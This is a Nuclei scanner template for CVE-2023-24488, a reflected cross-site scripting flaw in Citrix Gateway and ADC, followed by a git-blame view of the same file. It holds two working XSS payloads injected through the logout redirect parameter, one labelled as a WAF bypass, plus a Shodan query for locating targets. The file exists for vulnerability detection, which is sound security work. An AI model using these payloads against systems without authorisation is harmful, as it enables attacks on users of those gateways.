nuclei-templates/http/cves/2023/CVE-2023-24488.yaml

id: CVE-2023-24488

info:
  name: Citrix Gateway and Citrix ADC - Cross-Site Scripting
  author: johnk3r,DhiyaneshDk
  severity: medium
  description: |
    Citrix ADC and Citrix Gateway versions before 13.1 and 13.1-45.61, 13.0 and 13.0-90.11, 12.1 and 12.1-65.35 contain a cross-site scripting vulnerability due to improper input validation.
  remediation: |
    Apply the necessary patches or updates provided by Citrix to mitigate this vulnerability.
  reference:
    - https://support.citrix.com/article/CTX477714/citrix-adc-and-citrix-gateway-security-bulletin-for-cve202324487-cve202324488
    - https://blog.assetnote.io/2023/06/29/citrix-xss-advisory/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-24488
    - https://twitter.com/infosec_au/status/1674786106381070342
    - https://twitter.com/bxmbn/status/1675250259608449026
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-24488
    cwe-id: CWE-79
    epss-score: 0.01446
    epss-percentile: 0.85173
    cpe: cpe:2.3:a:citrix:gateway:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: citrix
    product: gateway
    shodan-query: title:"Citrix Gateway"
  tags: cve,cve2023,citrix,xss,adc

http:
  - method: GET
    path:
      - '{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E'
      - '{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.domain)</script>'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - <body x='&'onload="(alert)('citrix akamai bypass')">
          - <script>alert(document.domain)</script>
        condition: or

      - type: word
        part: body
        words:
          - "Content-Type: text/html"

      - type: status
        status:
          - 302
# digest: 490a0046304402203abcf849db44ab6ae1d3b4fb36336946bb4552a978929afeb2d896301aec1a4602201a8be21478218ea37dfbbbe90411af06c62110b8150c3b83b73c9f8ffe9b8b74:922c64590222798bb761d5b6d8e72950
Create CVE-2023-24488.yaml (#7581) * Create CVE-2023-24488.yaml * Update CVE-2023-24488.yaml * Update CVE-2023-24488.yaml * added metadata * fix matcher * added fixed and strict matchers + classification --------- Co-authored-by: Dhiyaneshwaran <leedhiyanesh@gmail.com> Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-06-30 17:58:56 +00:00			`id: CVE-2023-24488`

			`info:`
			`name: Citrix Gateway and Citrix ADC - Cross-Site Scripting`
Update CVE-2023-24488.yaml 2023-07-04 04:29:56 +00:00			`author: johnk3r,DhiyaneshDk`
Create CVE-2023-24488.yaml (#7581) * Create CVE-2023-24488.yaml * Update CVE-2023-24488.yaml * Update CVE-2023-24488.yaml * added metadata * fix matcher * added fixed and strict matchers + classification --------- Co-authored-by: Dhiyaneshwaran <leedhiyanesh@gmail.com> Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-06-30 17:58:56 +00:00			`severity: medium`
			`description: \|`
			`Citrix ADC and Citrix Gateway versions before 13.1 and 13.1-45.61, 13.0 and 13.0-90.11, 12.1 and 12.1-65.35 contain a cross-site scripting vulnerability due to improper input validation.`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`remediation: \|`
			`Apply the necessary patches or updates provided by Citrix to mitigate this vulnerability.`
Create CVE-2023-24488.yaml (#7581) * Create CVE-2023-24488.yaml * Update CVE-2023-24488.yaml * Update CVE-2023-24488.yaml * added metadata * fix matcher * added fixed and strict matchers + classification --------- Co-authored-by: Dhiyaneshwaran <leedhiyanesh@gmail.com> Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-06-30 17:58:56 +00:00			`reference:`
			`- https://support.citrix.com/article/CTX477714/citrix-adc-and-citrix-gateway-security-bulletin-for-cve202324487-cve202324488`
			`- https://blog.assetnote.io/2023/06/29/citrix-xss-advisory/`
			`- https://nvd.nist.gov/vuln/detail/CVE-2023-24488`
			`- https://twitter.com/infosec_au/status/1674786106381070342`
Update CVE-2023-24488.yaml 2023-07-04 04:29:56 +00:00			`- https://twitter.com/bxmbn/status/1675250259608449026`
Create CVE-2023-24488.yaml (#7581) * Create CVE-2023-24488.yaml * Update CVE-2023-24488.yaml * Update CVE-2023-24488.yaml * added metadata * fix matcher * added fixed and strict matchers + classification --------- Co-authored-by: Dhiyaneshwaran <leedhiyanesh@gmail.com> Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-06-30 17:58:56 +00:00			`classification:`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
Create CVE-2023-24488.yaml (#7581) * Create CVE-2023-24488.yaml * Update CVE-2023-24488.yaml * Update CVE-2023-24488.yaml * added metadata * fix matcher * added fixed and strict matchers + classification --------- Co-authored-by: Dhiyaneshwaran <leedhiyanesh@gmail.com> Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-06-30 17:58:56 +00:00			`cvss-score: 6.1`
			`cve-id: CVE-2023-24488`
			`cwe-id: CWE-79`
templateman update 2023-10-14 11:27:55 +00:00			`epss-score: 0.01446`
TemplateMan Update [Mon Nov 20 10:15:32 UTC 2023] :robot: 2023-11-20 10:15:32 +00:00			`epss-percentile: 0.85173`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`cpe: cpe:2.3:a:citrix:gateway::::::::`
Create CVE-2023-24488.yaml (#7581) * Create CVE-2023-24488.yaml * Update CVE-2023-24488.yaml * Update CVE-2023-24488.yaml * added metadata * fix matcher * added fixed and strict matchers + classification --------- Co-authored-by: Dhiyaneshwaran <leedhiyanesh@gmail.com> Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-06-30 17:58:56 +00:00			`metadata:`
TemplateMan Update [Tue Jul 4 09:06:45 UTC 2023] :robot: 2023-07-04 09:06:45 +00:00			`max-request: 2`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: citrix`
			`product: gateway`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`shodan-query: title:"Citrix Gateway"`
Create CVE-2023-24488.yaml (#7581) * Create CVE-2023-24488.yaml * Update CVE-2023-24488.yaml * Update CVE-2023-24488.yaml * added metadata * fix matcher * added fixed and strict matchers + classification --------- Co-authored-by: Dhiyaneshwaran <leedhiyanesh@gmail.com> Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-06-30 17:58:56 +00:00			`tags: cve,cve2023,citrix,xss,adc`

			`http:`
			`- method: GET`
			`path:`
Update CVE-2023-24488.yaml 2023-07-04 04:29:56 +00:00			`- '{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E'`
Update CVE-2023-24488.yaml 2023-07-04 08:54:43 +00:00			`- '{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.domain)</script>'`
Create CVE-2023-24488.yaml (#7581) * Create CVE-2023-24488.yaml * Update CVE-2023-24488.yaml * Update CVE-2023-24488.yaml * added metadata * fix matcher * added fixed and strict matchers + classification --------- Co-authored-by: Dhiyaneshwaran <leedhiyanesh@gmail.com> Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-06-30 17:58:56 +00:00
Update CVE-2023-24488.yaml 2023-07-04 08:54:43 +00:00			`stop-at-first-match: true`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00
Update CVE-2023-24488.yaml 2023-07-04 04:29:56 +00:00			`matchers-condition: and`
Create CVE-2023-24488.yaml (#7581) * Create CVE-2023-24488.yaml * Update CVE-2023-24488.yaml * Update CVE-2023-24488.yaml * added metadata * fix matcher * added fixed and strict matchers + classification --------- Co-authored-by: Dhiyaneshwaran <leedhiyanesh@gmail.com> Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-06-30 17:58:56 +00:00			`matchers:`
Update CVE-2023-24488.yaml 2023-07-04 04:29:56 +00:00			`- type: word`
			`part: body`
			`words:`
			`- <body x='&'onload="(alert)('citrix akamai bypass')">`
Update CVE-2023-24488.yaml 2023-07-04 08:54:43 +00:00			`- <script>alert(document.domain)</script>`
			`condition: or`

			`- type: word`
			`part: body`
			`words:`
Update CVE-2023-24488.yaml 2023-07-04 04:29:56 +00:00			`- "Content-Type: text/html"`

			`- type: status`
			`status:`
			`- 302`
Auto Template Signing [Tue Nov 21 02:28:47 UTC 2023] :robot: 2023-11-21 02:28:48 +00:00			`# digest: 490a0046304402203abcf849db44ab6ae1d3b4fb36336946bb4552a978929afeb2d896301aec1a4602201a8be21478218ea37dfbbbe90411af06c62110b8150c3b83b73c9f8ffe9b8b74:922c64590222798bb761d5b6d8e72950`